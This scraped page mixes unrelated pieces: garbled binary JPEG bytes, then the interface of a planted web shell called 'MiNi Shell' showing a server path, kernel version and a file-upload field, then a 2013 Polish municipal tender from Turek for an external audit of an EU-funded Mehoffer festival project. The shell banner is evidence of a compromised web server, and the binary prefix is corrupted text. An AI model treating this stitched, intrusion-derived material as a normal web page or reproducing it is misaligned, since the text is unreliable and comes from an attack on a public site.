JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130516/191246-N-2013.html

<p class="kh_header"><b>Turek: PRZEPROWADZENIA AUDYTU ZEWNĘTRZNEGO DLA PROJEKTU PN.: DZIAŁALNOŚĆ PROMOCYJNA NA RZECZ NOWEGO PRODUKTU KULTURY TUREK- MIASTO W KLIMACIE MEHOFFERA W CELU OŻYWIENIA POTENCJAŁU KULTUROWEGO REGIONU PROJEKT WSPÓŁFINANSOWANY ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU ROZWOJU REGIONALNEGO W RAMACH WIELKOPOLSKIEGO REGIONALNEGO PROGRAMU OPERACYJNEGO NA LATA 2007-2013,  DZIAŁANIE 6.2 ROZWÓJ KULTURY I ZACHOWANIE DZIEDZICTWA KULTUROWEGO SCHEMAT II PROJEKTY PROMOCYJNE</b><br>
<b>Numer ogłoszenia: 191246 - 2013; data zamieszczenia: 16.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Turku , ul. Kaliska 59, 62-700 Turek, woj. wielkopolskie, tel. 063 289 61 00, faks 063 289 61 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miastoturek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIA AUDYTU ZEWNĘTRZNEGO DLA PROJEKTU PN.: DZIAŁALNOŚĆ PROMOCYJNA NA RZECZ NOWEGO PRODUKTU KULTURY TUREK- MIASTO W KLIMACIE MEHOFFERA W CELU OŻYWIENIA POTENCJAŁU KULTUROWEGO REGIONU PROJEKT WSPÓŁFINANSOWANY ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU ROZWOJU REGIONALNEGO W RAMACH WIELKOPOLSKIEGO REGIONALNEGO PROGRAMU OPERACYJNEGO NA LATA 2007-2013,  DZIAŁANIE 6.2 ROZWÓJ KULTURY I ZACHOWANIE DZIEDZICTWA KULTUROWEGO SCHEMAT II PROJEKTY PROMOCYJNE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  przeprowadzenie audytu zewnętrznego działań realizowanych w ramach  projektu współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego, w ramach Regionalnego Programu Operacyjnego Województwa Wielkopolskiego na lata 2007-2013, działanie 6.2 Rozwój kultury i zachowanie dziedzictwa kulturowego Schemat II projekty promocyjne

Tytuł projektu: Działalność promocyjna na rzecz nowego produktu kultury Turek- miasto w klimacie Mehoffera w celu ożywienia potencjału kulturowego regionu

Zakres rzeczowy projektu obejmuje:  
1.Wykreowanie ogólnopolskiego festiwalu Mehofferowskie klimaty:
2.Ideą przewodnią festiwalu jest przeniesienie miasta w klimat z czasów Mehoffera (okres 20-lecia międzywojennego) przy jednoczesnym eksponowaniu walorów kulturowych regionu.
Kampanię promocyjną produktu to:
spoty reklamowe w radiu i tv, billboardy w miastach związanych z życiem i twórczością Mehoffera oraz w P-niu, Łodzi, Uniejowie i Turku, ogłoszenia w prasie o zasięgu regionalnym i ogólnopolskim.
3. Utworzenie strony internetowej produktu kultury -zachowania długofalowej promocji.
4.Materiały promocyjne na międzynarodowe targi turystyczne
5.Koszty wynagrodzeń - koszty zarządzania projektem

Okres  rzeczowej realizacji projektu: 28.01.2011r.- 15.10.2013r

Miejsce przechowywania dokumentacji projektowej: siedziba Urzędu Miejskiego w Turku, ul. Kaliska 59,62-700 Turek.
 
Zakres audytu obejmuje niżej wskazane obszary:

Ocena gotowości organizacyjnej beneficjenta i procedur wewnętrznych, w tym:
- wielkość i przygotowanie kadr,
-identyfikacja zadań wrażliwych (przede wszystkim dokonywanie wyboru wykonawców/dostawców, zawieranie umów, odbiór robót, dostaw i usług, zatwierdzanie faktur do wypłaty, dokonywanie płatności, księgowanie operacji finansowych),
-podział zadań w projekcie, w tym rozdział kluczowych funkcji,
-istnienie i jakość pisemnych procedur postępowania,
-wzory dokumentów,

Audyt finansowy, w tym:
- sprawdzenie, czy opracowane przez beneficjenta procedury zarządzania środkami finansowymi zapewniają rzetelną i terminową realizację i dokumentowanie operacji,
-sprawdzenie, czy procedury wewnętrzne beneficjenta gwarantują rzetelność sprawozdań z realizacji projektu i wniosków o płatność,
-sprawdzenie zgodności sprawozdań z realizacji projektu i wniosków o płatność z dokumentami źródłowymi, ewidencją księgową oraz z wnioskiem i umową o dofinansowanie projektu,
-ocena prawidłowości i wiarygodności poniesionych w ramach projektu wydatków,
-kontrola formalna faktur i ich zgodność z zapisami umów z wykonawcami,
-badanie poprawności księgowania (zgodność z zakładowym planem kont, wyodrębniona ewidencja księgowa, zgodność zapisów w ewidencji księgowej z treścią dokumentów źródłowych).

Audyt realizacji projektu, w tym:
-sprawdzenie zgodności realizacji projektu z przepisami prawa (prawo zamówień publicznych, przepisy o rachunkowości oraz o finansach publicznych itd.),
-ocena zgodności realizacji projektu z dokumentami programowymi  (program operacyjny, wytyczne i instytucje, podręczniki procedur),
-sprawdzenie zgodności realizacji projektu z zapisami wniosku o dofinansowanie umowy o dofinansowanie,
-potwierdzenie zgodności zakresu umów zawartych z wykonawcami z dokumentacją projektową (wniosek o dofinansowanie z załącznikami) oraz z dokumentacją z postępowania o udzielenie zamówienia publicznego (specyfikacja istotnych warunków zamówienia z załącznikami, oferta wybranego wykonawcy).
-sprawdzenie planowanego sposobu monitorowania osiągania celów projektu,
-potwierdzenie zgodności sprawozdań z realizacji projektu ze stanem faktycznym,
-sprawdzenie, czy cele projektu zostały zrealizowane i czy osiągnięto zakładany na dany okres poziom wskaźników.

Ocena prawidłowości i rzetelności prowadzenia i archiwizowania dokumentacji  w tym potwierdzenie, że:
-wprowadzone mechanizmy zapewniają właściwy obieg i sposób archiwizowania wszystkich dokumentów związanych z realizacją audytowanego projektu (wniosek o dofinansowanie, umowa o dofinansowanie i aneksy, wnioski o płatność , oryginały dowodów księgowych, dokumentacja przetargowa, korespondencja prowadzona w ramach realizacji inwestycji itd.)
-istnieje możliwość odtworzenia przebiegu realizacji projektu w wymaganych umową terminach,
-wprowadzone mechanizmy (w postaci wewnętrznych regulacji) są zgodne z zapisami umowy o dofinansowanie projektu.

Sprawdzenie zgodności projektu z politykami wspólnotowymi, w tym:
-z polityką równości szans,
-polityką zatrudnienia,
-polityką społeczeństwa  informacyjnego,

Analiza powodzenia projektu. w tym czy występują zagrożenia:
-prawidłowej realizacji projektu i terminowości jego zakończenia(dotyczy audytu  prowadzonego w trakcie realizacji projektu)
-osiągnięcia i utrzymania złożonych celów projektu przez okres wskazany we wniosku o dofinansowanie.
Czynności doradcze.

Audyt powinien być przeprowadzony w oparciu o:
-uznawane standardy audytu (np. obowiązujące w Polsce Międzynarodowe Standardy Profesjonalnej Praktyki Audytu Wewnętrznego - załącznik nr 1 do Komunikatu Nr 11 Ministra Finansów z dnia 26 czerwca 2006 r., dostępne na stronie www.mofnet.gov.pl) oraz 
aktualne Wytyczne Instytucji Zarządzającej Wielkopolskim Regionalnym Programem Operacyjnym na lata 2007--2013 w zakresie wyboru audytora oraz prowadzenia i dokumentowania audytu zewnętrznego  projektu dofinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu I- działania 1.4, 1.5 1.6 i 1.7 oraz Priorytetów II-VI, dostępne na stronie www.wrpo.wielkopolskie.pl .

Ponadto, Wykonawca zamówienia zobowiązany jest do:
-przekazania Zamawiającemu kopii dokumentacji roboczej: notatek, kwestionariuszy oceny, list sprawdzających itp. (lub co najmniej wykazu badanych dokumentów i wykazu sporządzonych dokumentów roboczych),
-prowadzenia audytu w sposób uwzględniający m.in. analizy dokumentów, wywiady z pracownikami i wykonawcami) ,
dokumentowania  audytu poprzez m.in. wykaz weryfikowanych dokumentów, listy sprawdzające, kwestionariusze samooceny, notatki/protokoły z wywiadów i spotkań),
-organizacji spotkań otwierających, zamykających oraz spotkań w trakcie prowadzenia audytu (udokumentowanych notatkami/protokołami podpisanymi przez uczestników spotkań),
-wyznaczenia osoby osób  do kontaktów z Zamawiającym ( komunikacja w formie pisemnej),
-sporządzenia sprawozdania z przeprowadzonego audytu, według obowiązujących na dzień wykonania audytu Wytycznych Instytucji Zarządzającej Wielkopolskim Regionalnym Programem Operacyjnym na lata 2007-2013 w zakresie wyboru audytora oraz prowadzenia i dokumentowania audytu zewnętrznego  projektu dofinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu I- działania 1.4, 1.5, 1.6, i 1.7 oraz Priorytetów II-VI dostępne na stronie www.wrpo.wielkopolskie.pl .
-stosowanie na wszystkich dokumentach sporządzonych w ramach prowadzonego audytu znaków informacyjnych o źródłach dofinansowania, zgodnie z wytycznymi  Zamawiającego.

Zamówienie publiczne objęte jest współfinansowaniem w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013
Z chwilą dostarczenia Zamawiającemu raportu końcowego z audytu Wykonawca nieodpłatnie przenosi na Zamawiającego wszelkie autorskie prawa majątkowe do wykonanego przedmiotu umowy, na terytorium Rzeczpospolitej Polskiej, na okres 10 lat od daty pierwszej publikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w niniejszym postępowaniu zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca złoży oświadczenie na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają udokumentowane doświadczenie w zakresie badania co najmniej jednego projektu finansowego ze środków publicznych. Za udokumentowane doświadczenie uznaje się referencje/zaświadczenie wystawione przez podmioty zlecające badanie audytowi</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca złoży oświadczenie na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do prowadzenia audytu zewnętrznego projektu współfinansowanego ze środków EFRR  w ramach WRPO uprawnione są osoby/podmioty zatrudniające osoby:

- spełniające wymogi wskazane w art. 286 ustawy z dnia 27 sierpnia 2009r. o finansach publicznych, +oraz
-  posiadające udokumentowane doświadczenie w badaniu projektów finansowych ze środków publicznych (przynajmniej jeden projekt). Za udokumentowane doświadczenie uznaje się referencje/zaświadczenia wystawione przez podmioty zlecające badanie audytowe.

Zgodnie z treścią art.286 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych, audytorem wewnętrznym może być osoba która:
-ma obywatelstwo państwa członkowskiego Unii Europejskiej lub innego państwa , którego obywatelom na podstawie umów międzynarodowych lub przepisów prawa wspólnotowego przysługuje prawo podjęcia zatrudnienia na terytorium Rzeczpospolitej Polskiej oraz
-ma pełną zdolność do czynności prawnych oraz korzysta z pełni praw publicznych, oraz
-nie była karana za umyślne przestępstwo lub umyślne przestępstwo skarbowe, oraz
-posiada wyższe wykształcenie, oraz
-posiada następujące kwalifikacje do prowadzenia audytu wewnętrznego - jeden z certyfikatów:
-Certified Internal Auditor (CIA),
-Certified Government Auditing Professional (CGAP),
-Certified Information Systems Auditor (CISA),
-Association of Chartered Certified Accountants (ACCA),
-Certified Fraud Examiner (CFE),
-Certification in Control Self-Assessment (CCSA),
-Certified Financial Services Auditor (CFSA),
-Chartered Financial Analyst (CFA)
lub
-złożyła w latach 2003-2006 z wynikiem pozytywnym egzamin na audytora wewnętrznego przed Komisją Egzaminacyjną powołaną przez Ministra Finansów,
lub
-posiada uprawnienia biegłego rewidenta
lub
-posiada dwuletnią praktykę w zakresie audytu wewnętrznego i legitymuje się dyplomem ukończenia studiów podyplomowych w zakresie audytu wewnętrznego, wydanym przez jednostkę organizacyjną, która w dniu wydania dyplomu była uprawniona, (zgodnie z odrębnymi ustawami ), do nadawania stopnia naukowego doktora nauk ekonomicznych lub prawnych (za praktykę  w zakresie audytu wewnętrznego uznaje się udokumentowane przez kierownika jednostki wykonywanie czynności , w wymiarze czasu nie mniejszym niż ? etatu, związanych z :
- przeprowadzeniem audytu wewnętrznego pod nadzorem audytora wewnętrznego ,
- realizacją przez inspektorów kontroli skarbowej czynności w zakresie certyfikacji i wydawania deklaracji zamknięcia pomocy finansowej ze środków pochodzących z Unii Europejskiej, o których mowa w ustawie z dnia 28 września 1991r. o kontroli skarbowej (t.j. Dz. U. z 2004r, Nr 8 ,poz 65 z póżn. zm.),
- nadzorowaniem lub wykonywaniem czynności kontrolnych , o których mowa w ustawie z dnia 23 grudnia 1994r. o Najwyższej Izbie Kontroli (t.j. z 2007 Dz.U. Nr 231, poz.1701 z póżn. zm.)

Warunkiem koniecznym do prowadzenia audytu zewnętrznego projektów realizowanych w ramach WRPO (niezależnie od posiadanych kwalifikacji zawodowych) jest spełnienie wymogów określonych w punkcie 3. od a) do d))

Zamawiający wymaga spełnienia co najmniej jednego z warunków określonych w pkt od e ) do h).

Zaleca się aby audyt zewnętrzny projektu prowadzony był przez co najmniej dwie osoby, z których przynajmniej jedna zobowiązana jest legitymować się uprawnieniami wskazanymi w punkcie 3) od e) do h) (wystarczające jest spełnienie jednego z tych warunków) oraz posiadać udokumentowane doświadczenie w zakresie badania projektów  finansowych ze środków publicznych (przynajmniej 1 projekt). Za udokumentowane doświadczenie uznaje się referencje/zaświadczenia wystawione przez podmioty zlecające badania audytowe. Osoby prowadzące badanie audytowi dysponują kwalifikacjami i doświadczeniem zapewniającym należytą ocenę prawidłowości realizowania projektu oraz spełniają wszystkie wymogi określone w punkcie 3) od a) do d).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca złoży oświadczenie na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany niniejszej umowy i uzupełnienia jej treści wymagają pod rygorem nieważności formy pisemnej w postaci aneksu do umowy.
2. Zamawiający przewiduje i zastrzega sobie wprowadzenie zmiany w treści umowy następujących zmian:
a)  zmiana terminu wykonania umowy w przypadku :
-  opóźnienia w uzyskaniu dokumentacji niezbędnej do wykonania przedmiotu umowy,
-konieczności zmiany osób wskazanych przez Wykonawcę do wykonania przedmiotu umowy z przyczyn niezależnych od Wykonawcy np.: rozwiązania stosunku pracy, śmierci,  choroby lub innych zdarzeń losowych, nie wywiązania się kluczowego członka zespołu audytowanego z obowiązków umownych.

W ww. przypadkach termin wykonania umowy ulegnie przedłużeniu o okres, w którym niemożliwe było wykonanie przedmiotu umowy,
b) zmiana osoby lub osób wskazanych przez Wykonawcę do wykonania przedmiotu umowy z przyczyn niezależnych od Wykonawcy np.: rozwiązania stosunku pracy, śmierci, choroby, lub innych zdarzeń losowych, nie wywiązania się kluczowego członka zespołu audytowego z obowiązków umownych na osoby o równoważnych lub wyższych kwalifikacjach,
c) zmiana zakresu audytu w przypadku zmiany unormowań regulujących wykonanie   przedmiotu niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastoturek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Turku ul. Kaliska 59, 62-700 Turek - Biuro Zamówień Publicznych i Zakupów pok 122.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2013 godzina 11:00, miejsce: Urząd Miejski w Turku ul. Kaliska 59, 62-700 Turek - Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Wielkopolskiego na lata 2007-2013, działanie 6.2 Rozwój kultury i zachowanie dziedzictwa kulturowego Schemat II projekty promocyjne.</p>
